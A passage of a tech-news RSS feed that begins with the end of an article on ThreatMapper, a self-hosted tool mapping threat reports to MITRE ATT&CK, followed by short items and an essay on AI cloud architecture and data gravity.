"T1021.001"]}'<br># Load a specific layer (returns technique_ids)<br>LAYER_ID="550e8400-e29b-41d4-a716-446655440000"<br>curl "http://localhost:8000/api/layers/$LAYER_ID" | python -m json.tool<br># Delete a layer<br>curl -X DELETE "http://localhost:8000/api/layers/$LAYER_ID"</pre><h4>Stream an analysis (Python example)</h4><pre>import httpx, json<br>with httpx.stream(<br>    "POST",<br>    "http://localhost:8000/api/analyze/stream",<br>    data={"provider": "claude", "domain": "enterprise-attack"},<br>    files={"file": open("report.pdf", "rb")},<br>    timeout=300,<br>) as r:<br>    for line in r.iter_lines():<br>        if line.startswith("data: "):<br>            event = json.loads(line[6:])<br>            if event["type"] == "token":<br>                print(event["content"], end="", flush=True)<br>            elif event["type"] == "result":<br>                print("\n\nFinal techniques:")<br>                for t in event["data"]["techniques"]:<br>                    print(f"  {t['attack_id']} ({t['confidence']*100:.0f}%) - {t['name']}")<br>            elif event["type"] == "error":<br>                print(f"\nError: {event['message']}")</pre><h3>Keeping ATT&amp;CK Data Fresh</h3><p>ATT&amp;CK releases new versions periodically (approximately twice a year). ThreatMapper checks for new versions daily at 03:00 UTC via a Celery Beat job.</p><p>The sidebar footer shows a pulsing amber indicator when a new version is available. Trigger an update:</p><pre># Quick API call<br>curl -X POST http://localhost:8000/api/sync/trigger</pre><pre># Check what version you have vs what's available<br>curl <a href="http://localhost:8000/api/sync/status">http://localhost:8000/api/sync/status</a></pre><p>The sync downloads only the new bundle version and ingests it alongside the existing data without deleting anything. Both versions remain queryable — endpoints accept an optional ?version=19.1 parameter to target a specific release.</p><h3>Tips for Analysts</h3><p><strong>Calibrate your confidence threshold.</strong> I recommend treating &lt; 50% confidence as noise until you validate it manually. The LLM is trying hard to find ATT&amp;CK mappings, which means it will sometimes stretch an inference. Use the evidence snippet to sanity-check every mapping.</p><p><strong>Use the Gap Analysis as a hunt checklist.</strong> When you match against an APT group in Compare, the Gap Analysis tab shows every technique in their known profile that you haven’t covered. This is an excellent input for a structured hunt — you’re essentially asking <em>“what would we need to observe to confirm this attribution?”</em></p><p><strong>Chain features for maximum value.</strong> The best workflow is: AI Analysis → inject into Navigator → Compare against APT groups → Gap Analysis → export PDF. Each step builds on the last.</p><p><strong>Chat is good for detection rules.</strong> The AI assistant is particularly strong at generating SIGMA rules, KQL queries, and Splunk SPL from ATT&amp;CK technique IDs. Give it the full ATT&amp;CK technique description plus any specific context from your environment (OS, logging stack) and you’ll get useful starting points rather than generic templates.</p><p><strong>Import your existing layers.</strong> If your team already maintains ATT&amp;CK Navigator layers for your environment (e.g. a “what we detect” layer and a “what we’ve seen” layer), import them via the ↑ Import button. ThreatMapper will let you compare them against APT profiles and run AI chat against the techniques in the layer.</p><p><strong>Save named layers as investigation checkpoints.</strong> After any significant piece of work — a completed AI analysis, a finished APT comparison session, a purple-team prep layer — click <strong>↓ Save layer</strong> and give it a meaningful name. This takes 10 seconds and means you never lose work between sessions. You can reload any saved layer instantly from <strong>📂 Load layer</strong> without re-running analysis.</p><p><strong>Use text paste for quick triage.</strong> You don’t need a formatted document. Paste raw Slack thread text, a SIEM alert body, or a vendor advisory into the text box. The AI is good at extracting signal from noisy, informal text.</p><h3>Security Considerations</h3><p>ThreatMapper is designed for internal/intranet use. It has no built-in authentication — anyone who can reach the Docker network can use it.</p><p><strong>For a team deployment:</strong></p><ol><li>Set a strong DB_PASS in .env</li><li>Put ThreatMapper behind nginx / Caddy with TLS and HTTP Basic Auth (or integrate with your identity provider via OAuth)</li><li>Run the Docker containers on an internal network that is not directly internet-accessible</li><li>The .env file containing your LLM API keys should have chmod 600 and never be committed to git</li></ol><p>Your threat intelligence reports are stored in PostgreSQL inside the Docker volume. If you need to comply with data handling policies, deploy ThreatMapper on infrastructure that meets those policies — since it’s self-hosted, you retain full control.</p><h3>What’s Coming Next</h3><p>The tool is functional but there is plenty of room to grow. Things I’m actively thinking about:</p><ul><li><strong>TAXII/STIX import</strong> — accept threat intelligence directly from TAXII feeds (MISP, OpenCTI, commercial CTI platforms)</li><li><strong>Team collaboration</strong> — shared TTP layers with user namespacing</li><li><strong>Detection coverage overlay</strong> — import your existing SIGMA rule library and visualise which ATT&amp;CK techniques you have coverage for vs which are blind spots</li><li><strong>Automatic APT tracking</strong> — when ATT&amp;CK releases a new version that adds techniques to a group you’re tracking, send a notification</li></ul><h3>Final Thoughts</h3><p>The core idea behind ThreatMapper is that the heavy lifting of ATT&amp;CK mapping — reading a report, recognising a technique, looking it up, comparing it — is exactly the kind of repetitive, pattern-matching work that LLMs are well-suited for.</p><p>The analyst’s judgement is still essential: deciding which mappings to trust, what the attribution implications are, what to do about the gap analysis. But the mechanical translation layer — text to ATT&amp;CK IDs — should not take most of your time.</p><p>ThreatMapper tries to handle that translation layer so you can spend your time on the interesting parts.</p><p>The project is open source under the MIT licence. If you find it useful, have feature requests, or find bugs, open an issue on GitHub.</p><p><strong>GitHub:</strong> <a href="https://github.com/anpa1200/threatmapper">https://github.com/anpa1200/threatmapper</a><br><strong>API Docs:</strong> <a href="http://localhost:8000/docs">http://localhost:8000/docs</a> (after starting with docker compose up)</p><p><em>ThreatMapper uses the MITRE ATT&amp;CK® framework. ATT&amp;CK is a registered trademark of The MITRE Corporation. This project is not affiliated with or endorsed by MITRE.</em></p><h3>Follow for practical cybersecurity research</h3><p>If you’re interested in <strong>Offensive security,</strong> <strong>AI security, real-world attack simulations, CTI, and detection engineering</strong> — this is exactly what I focus on.</p><h4>Stay connected:</h4><p>→ <strong>Subscribe on Medium:</strong> <a href="https://medium.com/@1200km">medium.com/@1200km</a><br>→ <strong>Connect on LinkedIn:</strong> <a href="https://www.linkedin.com/in/andrey-pautov/">andrey-pautov</a><br>→ <strong>GitHub — tools &amp; labs:</strong> <a href="https://github.com/anpa1200">github.com/anpa1200</a><br>→ <strong>Contact:</strong> <a href="mailto:1200km@gmail.com">1200km@gmail.com</a></p><p><strong>Andrey Pautov</strong></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=0aa7673e6bd8" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/threatmapper-i-built-a-self-hosted-ai-threat-intelligence-platform-heres-how-to-use-it-0aa7673e6bd8">ThreatMapper: I Built a Self-Hosted AI Threat Intelligence Platform — Here’s How to Use It</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Not Microsoft, but OEMs are quietly bricking Windows 11 PCs, here’s what you need to know]]></title>
<description><![CDATA[Microsoft is finally fixing Windows 11 with native performance upgrades, but OEMs are ruining the experience. Recent HP BIOS updates have triggered endless BitLocker recovery loops, while Dell's SupportAssist software is causing constant BSODs, unfairly destroying the operating system's reputatio...]]></description>
<link>https://tsecurity.de/de/3579982/windows-tipps/not-microsoft-but-oems-are-quietly-bricking-windows-11-pcs-heres-what-you-need-to-know/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3579982/windows-tipps/not-microsoft-but-oems-are-quietly-bricking-windows-11-pcs-heres-what-you-need-to-know/</guid>
<pubDate>Sun, 07 Jun 2026 22:39:27 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Microsoft is finally fixing Windows 11 with native performance upgrades, but OEMs are ruining the experience. Recent HP BIOS updates have triggered endless BitLocker recovery loops, while Dell's SupportAssist software is causing constant BSODs, unfairly destroying the operating system's reputation.</p>
<p>The post <a rel="nofollow" href="https://www.windowslatest.com/2026/06/08/not-microsoft-but-oems-are-quietly-bricking-windows-11-pcs-heres-what-you-need-to-know/">Not Microsoft, but OEMs are quietly bricking Windows 11 PCs, here’s what you need to know</a> appeared first on <a rel="nofollow" href="https://www.windowslatest.com/">Windows Latest</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The better way to use Gemini on the Mac]]></title>
<description><![CDATA[Back in April, Google joined OpenAI and Anthropic in offering a dedicated Mac app for its AI chatbot software. Two months later, it’s clear that Gemini for Mac isn’t as good as it could be. 



 more…]]></description>
<link>https://tsecurity.de/de/3576628/ios-mac-os/the-better-way-to-use-gemini-on-the-mac/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3576628/ios-mac-os/the-better-way-to-use-gemini-on-the-mac/</guid>
<pubDate>Fri, 05 Jun 2026 23:39:23 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="feat-image"><img src="https://9to5mac.com/wp-content/uploads/sites/6/2026/04/gemini-mac.jpg?quality=82&amp;strip=all&amp;w=1600"></div><p class="wp-block-paragraph">Back in April, Google joined OpenAI and Anthropic in <a href="https://9to5mac.com/2026/04/15/google-launches-gemini-mac-app-heres-what-it-offers/">offering a dedicated Mac app</a> for its AI chatbot software. Two months later, it’s clear that Gemini for Mac isn’t as good as it could be. </p>



 <a data-layer-pagetype="post" data-layer-postcategory="apps,gemini,mac" data-layer-viewtype="taxonomy-ninetofive_guides" data-post-id="1054758" href="https://9to5mac.com/2026/06/05/the-better-way-to-use-gemini-on-the-mac/#more-1054758" class="more-link">more…</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[The big AI labs are eating the startup playbook — here’s where founders can still compete]]></title>
<description><![CDATA[Startup founders used to worry that tech giants would make their product obsolete.  Now it’s even trickier: AI labs are not only encroaching on startup turf, they’re also offering tools for customers to attempt DIY solutions of their own. But there are approaches that work, and niches to be found...]]></description>
<link>https://tsecurity.de/de/3576327/it-nachrichten/the-big-ai-labs-are-eating-the-startup-playbook-heres-where-founders-can-still-compete/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3576327/it-nachrichten/the-big-ai-labs-are-eating-the-startup-playbook-heres-where-founders-can-still-compete/</guid>
<pubDate>Fri, 05 Jun 2026 20:32:37 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1260" height="841" src="https://cdn.geekwire.com/wp-content/uploads/2026/06/investorpanel-1260x841.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://cdn.geekwire.com/wp-content/uploads/2026/06/investorpanel-1260x841.jpg 1260w, https://cdn.geekwire.com/wp-content/uploads/2026/06/investorpanel-768x513.jpg 768w, https://cdn.geekwire.com/wp-content/uploads/2026/06/investorpanel-1536x1026.jpg 1536w, https://cdn.geekwire.com/wp-content/uploads/2026/06/investorpanel-2048x1367.jpg 2048w" sizes="(max-width: 1260px) 100vw, 1260px"><br>Startup founders used to worry that tech giants would make their product obsolete.  Now it’s even trickier: AI labs are not only encroaching on startup turf, they’re also offering tools for customers to attempt DIY solutions of their own. But there are approaches that work, and niches to be found, according to speakers and panelists at the Tech Alliance Seattle Investor Summit+Showcase this week. <a href="https://www.geekwire.com/2026/the-big-ai-labs-are-eating-the-startup-playbook-heres-where-founders-can-still-compete/">Read More</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Only 10% of SOCs Say They’re Getting Excellent Value From AI. Here’s What the Second Wave Has to Deliver]]></title>
<description><![CDATA[Eighteen months ago, the AI SOC was a marketing line. Today it’s a budget item. The category has crossed over from interesting to inevitable, with billions of dollars now flowing into AI-powered security operations platforms, agentic SOC tools, and AI…
Read more →
The post Only 10% of SOCs Say Th...]]></description>
<link>https://tsecurity.de/de/3575372/it-security-nachrichten/only-10-of-socs-say-theyre-getting-excellent-value-from-ai-heres-what-the-second-wave-has-to-deliver/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3575372/it-security-nachrichten/only-10-of-socs-say-theyre-getting-excellent-value-from-ai-heres-what-the-second-wave-has-to-deliver/</guid>
<pubDate>Fri, 05 Jun 2026 14:37:34 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Eighteen months ago, the AI SOC was a marketing line. Today it’s a budget item. The category has crossed over from interesting to inevitable, with billions of dollars now flowing into AI-powered security operations platforms, agentic SOC tools, and AI…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/only-10-of-socs-say-theyre-getting-excellent-value-from-ai-heres-what-the-second-wave-has-to-deliver/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/only-10-of-socs-say-theyre-getting-excellent-value-from-ai-heres-what-the-second-wave-has-to-deliver/">Only 10% of SOCs Say They’re Getting Excellent Value From AI. Here’s What the Second Wave Has to Deliver</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thieves can pull off keyless car theft in under a minute and here’s how to stop them]]></title>
<description><![CDATA[A keyless car can be stolen in under a minute. Two people, a pair of cheap radio amplifiers, and a fob sitting on a hallway table inside the house. That is enough. No broken glass. No alarm. No sound. Most…
Read more →
The post Thieves can pull off keyless car theft in under a minute and here’s h...]]></description>
<link>https://tsecurity.de/de/3574503/it-security-nachrichten/thieves-can-pull-off-keyless-car-theft-in-under-a-minute-and-heres-how-to-stop-them/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3574503/it-security-nachrichten/thieves-can-pull-off-keyless-car-theft-in-under-a-minute-and-heres-how-to-stop-them/</guid>
<pubDate>Fri, 05 Jun 2026 08:04:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A keyless car can be stolen in under a minute. Two people, a pair of cheap radio amplifiers, and a fob sitting on a hallway table inside the house. That is enough. No broken glass. No alarm. No sound. Most…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/thieves-can-pull-off-keyless-car-theft-in-under-a-minute-and-heres-how-to-stop-them/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/thieves-can-pull-off-keyless-car-theft-in-under-a-minute-and-heres-how-to-stop-them/">Thieves can pull off keyless car theft in under a minute and here’s how to stop them</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here's what's coming to GeForce NOW in June including NTE: Neverness to Everness, SpaceCraft, Gothic 1 Remake]]></title>
<description><![CDATA[NVIDIA have revealed what's to come for GeForce NOW during June 2026 and there's some good stuff available for fans of cloud gaming.Read the full article on GamingOnLinux.]]></description>
<link>https://tsecurity.de/de/3572862/linux-tipps/heres-whats-coming-to-geforce-now-in-june-including-nte-neverness-to-everness-spacecraft-gothic-1-remake/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3572862/linux-tipps/heres-whats-coming-to-geforce-now-in-june-including-nte-neverness-to-everness-spacecraft-gothic-1-remake/</guid>
<pubDate>Thu, 04 Jun 2026 16:10:05 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[NVIDIA have revealed what's to come for GeForce NOW during June 2026 and there's some good stuff available for fans of cloud gaming.<p><img src="https://www.gamingonlinux.com/uploads/articles/tagline_images/1237718463id29151gol.jpg" alt></p><p>Read the full article on <a href="https://www.gamingonlinux.com/2026/06/heres-whats-coming-to-geforce-now-in-june-including-nte-neverness-to-everness-spacecraft-gothic-1-remake/">GamingOnLinux</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Struggling With Network Security? Here’s How SASE Solves It]]></title>
<description><![CDATA[Network security used to be straightforward: build a strong perimeter, keep the important stuff inside it, and block anything suspicious at the edge. But that model doesn’t match how most businesses operate anymore.]]></description>
<link>https://tsecurity.de/de/3572537/it-security-nachrichten/struggling-with-network-security-heres-how-sase-solves-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3572537/it-security-nachrichten/struggling-with-network-security-heres-how-sase-solves-it/</guid>
<pubDate>Thu, 04 Jun 2026 14:24:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="hs-featured-image-wrapper"> 
 <a href="https://www.cm-alliance.com/cybersecurity-blog/struggling-with-network-security-heres-how-sase-solves-it" title="" class="hs-featured-image-link"> <img src="https://www.cm-alliance.com/hubfs/SASE_cropped.webp" alt="SASE for Better Network Security" class="hs-featured-image"> </a> 
</div> 
<p><span>Network security used to be straightforward: build a strong perimeter, keep the important stuff inside it, and block anything suspicious at the edge. But that model doesn’t match how most businesses operate anymore.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Travel scams are everywhere. Here’s how to avoid them]]></title>
<description><![CDATA[Learn how to spot travel scams, avoid risky bookings, and keep your personal information out of the wrong hands. This article has been indexed from Malwarebytes Read the original article: Travel scams are everywhere. Here’s how to avoid them
Read more →
The post Travel scams are everywhere. Here’...]]></description>
<link>https://tsecurity.de/de/3572461/it-security-nachrichten/travel-scams-are-everywhere-heres-how-to-avoid-them/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3572461/it-security-nachrichten/travel-scams-are-everywhere-heres-how-to-avoid-them/</guid>
<pubDate>Thu, 04 Jun 2026 14:07:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Learn how to spot travel scams, avoid risky bookings, and keep your personal information out of the wrong hands. This article has been indexed from Malwarebytes Read the original article: Travel scams are everywhere. Here’s how to avoid them</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/travel-scams-are-everywhere-heres-how-to-avoid-them/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/travel-scams-are-everywhere-heres-how-to-avoid-them/">Travel scams are everywhere. Here’s how to avoid them</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Your AI cloud strategy isn’t about cost. It’s about gravity]]></title>
<description><![CDATA[I’ve spent the better part of the last eighteen months in conference rooms with CIOs working through their AI strategy. The conversations all start in the same place — model selection, vendor evaluation, agent frameworks — and they all eventually arrive at the same uncomfortable question.



“Whe...]]></description>
<link>https://tsecurity.de/de/3572283/it-security-nachrichten/your-ai-cloud-strategy-isnt-about-cost-its-about-gravity/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3572283/it-security-nachrichten/your-ai-cloud-strategy-isnt-about-cost-its-about-gravity/</guid>
<pubDate>Thu, 04 Jun 2026 13:07:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>I’ve spent the better part of the last eighteen months in conference rooms with CIOs working through their AI strategy. The conversations all start in the same place — model selection, vendor evaluation, agent frameworks — and they all eventually arrive at the same uncomfortable question.</p>



<p>“Where is this actually going to run?”</p>



<p>The question lands awkwardly because it sounds like it should have been settled years ago. Most enterprises picked their cloud provider somewhere between 2015 and 2020. They standardized on AWS, Azure or GCP, signed multi-year commits, and built their application portfolio accordingly. The cloud strategy was done. So why is it suddenly back on the table?</p>



<p>Because the workload changed underneath it. The cloud strategy that made sense for stateless web applications doesn’t make sense for AI agents and the CIOs figuring this out fastest are the ones rebuilding their architecture around a constraint most of their procurement teams don’t even know exists yet.</p>



<h2 class="wp-block-heading">The old cloud calculus is broken</h2>



<p>For roughly a decade, cloud strategy was about where applications run. You optimized for compute price, developer velocity and managed services. Data was something you moved to where the apps were. This worked because the data-to-compute ratio was small. A typical application request moved kilobytes of structured data between the app and its database.</p>



<p>The architectural pattern that emerged was elegant in its simplicity: applications in one region, data in another, users somewhere else entirely and the network in between papered over the seams. Latency budgets were measured in user-perceptible terms — a 200ms page load was acceptable, a 500ms one was a problem. Cross-region calls were a tax you paid for resilience or for putting compute close to the user.</p>



<p>That entire model assumed the application was the thing doing the work, and the data was the thing being acted upon.</p>



<p>AI agents inverted that assumption.</p>



<h2 class="wp-block-heading">AI inverted the ratio</h2>



<p>Agents don’t just consume data. They live in it.</p>



<p>Memory, context, retrieval, embeddings — the data isn’t an input to the workload. It largely <em>is</em> the workload. An agent reasoning about a customer’s situation is pulling in conversation history, organizational policies, product documentation and structured records on every turn. An agent writing code is pulling in the repository, the architectural decision records, the test suite and the relevant runtime telemetry. An agent doing financial analysis is pulling in market data, internal forecasts, regulatory filings and historical context — and then producing intermediate results that feed back into the next reasoning step.</p>



<p>The data isn’t a thing the workload references occasionally. It’s the substrate the workload is computing on.</p>



<p>And that substrate has gravity.</p>



<p>It has <strong>regulatory gravity</strong> — sovereignty mandates, residency requirements, sector-specific compliance regimes that say data of a particular type cannot leave a particular jurisdiction. The <a href="https://artificialintelligenceact.eu/" rel="nofollow">EU AI Act</a>, HIPAA, financial services regulations across a dozen countries — these aren’t preferences. They’re constraints that determine, before you’ve made any architectural decisions at all, where some of your data is allowed to be.</p>



<p>It has <strong>economic gravity</strong> — egress fees, GPU-hour pricing differentials, the brute economics of <a href="https://www.earezki.com/ai-news/2026-03-01-i-compared-data-egress-costs-across-44-cloud-providers-heres-the-breakdown/" rel="nofollow">moving terabyte-scale corpora across cloud boundaries</a>. Training data and embedding stores aren’t gigabytes anymore. Moving them isn’t a config change. It’s a project, sometimes a quarter-long one, with a real bill attached.</p>



<p>It has <strong>incumbency gravity</strong> — the data is where it is, and moving petabytes is not on this year’s roadmap. Most enterprises have data sprawled across systems that were never designed to be portable. The fact that your customer records live in a particular cloud isn’t because someone made a strategic decision in 2026. It’s because they made a strategic decision in 2017 and the data has been accumulating there ever since.</p>



<p>And it has <strong>latency gravity</strong> — and this is the one that’s quietly rewriting the architecture for everyone.</p>



<h2 class="wp-block-heading">Wall time is the forcing function</h2>



<p>Here’s the math that nobody puts in their slide decks.</p>



<p>A modest agentic loop (retrieve, reason, act, observe) easily does five to ten round trips per task. The agent retrieves relevant context. Reasons about it. Calls a tool. Observes the result. Reasons about that. Retrieves more context. Acts again. Each of those steps touches the data layer, the memory store, the model and back.</p>



<p>Now put 50 milliseconds of cross-region network latency on each hop. That’s 250 to 500 milliseconds of pure network tax on every single agent task, on top of the actual model inference and tool execution. Run that loop a hundred times an hour, across thousands of concurrent agent sessions, and you’re not looking at a minor degradation. You’re looking at the difference between an agent that feels alive and an agent that feels like dial-up.</p>



<p>This is why I keep telling CIOs the same thing in those conference rooms: your data, your memory store, your models and your agent runtime need to be in the same physical datacenter. Period.</p>



<p>Whether that physical datacenter is yours or one of the hyperscalers’ is the actual question worth debating. But they have to be co-located. If you’re spreading these across regions or providers to chase a procurement discount, you’re sabotaging your own AI strategy before it ships.</p>



<p>I want to head off two objections before the comments section gets to them.</p>



<p>“What about agents that legitimately need to span regions? Say, a global customer service agent that needs to retrieve from regional data stores?”</p>



<p>Those aren’t really one agent. They’re a federation of regional agents with a routing layer on top, and the wall-time math applies within each region. The federation is the architecture. Pretending it’s one agent stretched across geographies is how you end up with the dial-up problem.</p>



<p>“What about hyperscaler private connectivity? <a href="https://aws.amazon.com/directconnect/" rel="nofollow">Direct Connect</a>, <a href="https://learn.microsoft.com/en-us/azure/expressroute/expressroute-introduction" rel="nofollow">ExpressRoute</a>. That gets cross-region latency down to single-digit milliseconds?”</p>



<p>Single-digit milliseconds still compounds across an agentic loop more than it did for human-driven activity. Five hops at 5ms are 25ms of network tax per task, which adds up across millions of tasks.</p>



<p>And private connectivity doesn’t solve the other gravities. It doesn’t make data residency mandates go away. It doesn’t change egress economics for the data itself. It just makes a single dimension of the problem somewhat better.</p>



<p>The constraint is physics, not procurement. You can’t negotiate with the speed of light.</p>



<h2 class="wp-block-heading">That’s why the cloud market fragmented</h2>



<p>Once you accept that agents have to run physically next to their data, memory and models, the <a href="https://www.datacenterknowledge.com/cloud/earnings-roundup-neoclouds-shift-from-gpu-race-to-power-wars" rel="nofollow">recent fragmentation of the AI cloud market</a> starts to make sense.</p>



<p>Sovereign clouds aren’t winning on patriotism. They’re winning where regulatory gravity dominates and the data is already on a particular side of a particular border. Neoclouds aren’t winning on a vibe shift. They’re winning where economic gravity dominates and GPU-hour pricing makes the math work. Private clouds aren’t winning because on-prem is back in fashion. They’re winning where incumbency gravity dominates and the data is already in your datacenter and isn’t going anywhere. Hyperscalers are still winning where developer gravity and managed services dominate, and where the data is already in their object storage from a decade of cloud migration.</p>



<p>These aren’t competing on the old dimensions. They’re each winning in scenarios where a different gravity is the binding constraint.</p>



<p>The right question isn’t which cloud you should pick. It’s which gravity dominates for each workload, and therefore where the <em>whole stack</em> (data, memory, model, agent runtime) needs to be co-located. Some agents will run in three places. Some agents will need to move between them. That’s why deployment flexibility matters more than it ever did when we were just running stateless apps.</p>



<h2 class="wp-block-heading">What CIOs should actually do this quarter</h2>



<p>Stop picking a cloud. Start mapping your agent portfolio against the four gravities and let the architecture fall out of that.</p>



<p>For each AI workload you’re planning to put into production over the next twelve months, work through four questions:</p>



<ol class="wp-block-list">
<li><strong>Where does the data live, or where is it going to end up?</strong> Not where you wish it lived. Where it actually is, or where regulatory or business reality is forcing it to be. This is the answer that constrains everything else.</li>



<li><strong>Which gravity is dominant?</strong> If regulatory mandates are non-negotiable, that’s your binding constraint. If GPU economics are the issue, that’s your binding constraint. If you have ten petabytes of historical data sitting in a particular cloud and moving it is a multi-year project, that’s your binding constraint.</li>



<li><strong>What’s the wall-time budget for the agent loop?</strong> If it’s a batch workload, you have flexibility. If it’s a real-time customer-facing agent, you need everything in the same datacenter and you need to design for it from day one.</li>



<li><strong>What’s the portability requirement?</strong> As model providers compete and pricing shifts, can you move the agent runtime without moving the data? Can you move the data without rewriting the agent? Lock-in used to be denominated in egress fees. Now it’s denominated in token pricing, embedding model compatibility and agent framework portability.</li>
</ol>



<p>The CIOs who get this wrong won’t lose because they chose the wrong cloud. They’ll lose because they chose <em>a</em> cloud. Singular, monolithic, picked once in 2019 when the right answer was a portfolio architected around the gravities of each workload.</p>



<p>Cloud strategy stopped being a procurement decision the day agents became the workload. It became a physics problem. And the physics doesn’t care which vendor you signed with.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here’s $500 Off the Galaxy S26 Ultra]]></title>
<description><![CDATA[If I were shopping for a top tier phone like the Galaxy S26 Ultra for myself, I would look for deals from prepaid carriers, because I’m a firm believer in the prepaid plan movement. Everything in this country gets more expensive by the week, but by switching to prepaid, you can actually save quit...]]></description>
<link>https://tsecurity.de/de/3567561/it-nachrichten/heres-500-off-the-galaxy-s26-ultra/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3567561/it-nachrichten/heres-500-off-the-galaxy-s26-ultra/</guid>
<pubDate>Tue, 02 Jun 2026 22:31:19 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>If I were shopping for a top tier phone like the Galaxy S26 Ultra for myself, I would look for deals from prepaid carriers, because I’m a firm believer in the prepaid plan movement. Everything in this country gets more expensive by the week, but by switching to prepaid, you can actually save quite a...</p>
<p>Read the original post: <a href="https://www.droid-life.com/2026/06/02/heres-500-off-the-galaxy-s26-ultra/">Here’s $500 Off the Galaxy S26 Ultra</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here’s how MacBook Neo sales compare to M5 MacBook Air and Pro]]></title>
<description><![CDATA[A new IDC report (via TechCrunch) offers a glimpse into MacBook Neo sales in its first few weeks compared to the also-new M5 MacBook Air and MacBook Pro models.



 more…]]></description>
<link>https://tsecurity.de/de/3566864/ios-mac-os/heres-how-macbook-neo-sales-compare-to-m5-macbook-air-and-pro/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3566864/ios-mac-os/heres-how-macbook-neo-sales-compare-to-m5-macbook-air-and-pro/</guid>
<pubDate>Tue, 02 Jun 2026 18:25:12 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="feat-image"><img src="https://9to5mac.com/wp-content/uploads/sites/6/2026/03/macbook-neo-vs-air.jpg?quality=82&amp;strip=all&amp;w=1600"></div><p>A new IDC report (<a href="https://techcrunch.com/2026/06/02/apples-macbook-neo-is-winning-over-a-new-generation-of-buyers/">via <em>TechCrunch</em></a>) offers a glimpse into MacBook Neo sales in its first few weeks compared to the also-new M5 MacBook Air and MacBook Pro models.</p>



 <a data-layer-pagetype="post" data-layer-postcategory="mac,macbook-air,macbook-neo,macbook-pro" data-layer-viewtype="taxonomy-ninetofive_guides" data-post-id="1054202" href="https://9to5mac.com/2026/06/02/heres-how-macbook-neo-sales-compare-to-m5-macbook-air-and-pro/#more-1054202" class="more-link">more…</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI-Driven Exploitation is Destroying Vulnerability Management. Here’s How to Handle It.]]></title>
<description><![CDATA[AI-driven exploitation timelines are rapidly shrinking, and they are not going to stop shrinking. Vulnerabilities are being discovered, reproduced, and weaponized faster than ever in the history of enterprise security. As a result, the window between a vulnerability being disclosed…
Read more →
T...]]></description>
<link>https://tsecurity.de/de/3566097/it-security-nachrichten/ai-driven-exploitation-is-destroying-vulnerability-management-heres-how-to-handle-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3566097/it-security-nachrichten/ai-driven-exploitation-is-destroying-vulnerability-management-heres-how-to-handle-it/</guid>
<pubDate>Tue, 02 Jun 2026 14:35:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
